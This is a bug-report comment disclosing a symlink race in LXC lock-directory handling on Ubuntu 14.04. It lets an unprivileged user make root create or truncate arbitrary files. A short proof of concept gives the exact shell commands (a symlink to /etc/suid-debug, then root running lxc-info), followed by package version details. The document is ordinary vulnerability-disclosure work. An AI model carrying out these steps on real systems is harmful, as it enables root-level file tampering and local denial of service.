Comment 0 for bug 1470842

When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.

POC:

# su -s /bin/bash nobody
# mkdir -p lxc/var/lib/lxc
# ln -s /etc/suid-debug lxc/var/lib/lxc/somename

As root:

lxc-info --name somename

The guest "somename" has to exist, the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS

# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04

# apt-cache policy lxc
lxc:
  Installed: 1.0.7-0ubuntu0.1
  Candidate: 1.0.7-0ubuntu0.1
  Version table:
 *** 1.0.7-0ubuntu0.1 0
        500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
        100 /var/lib/dpkg/status
     1.0.3-0ubuntu3 0
        500 http://archivexxx/ubuntu/ trusty/main amd64 Packages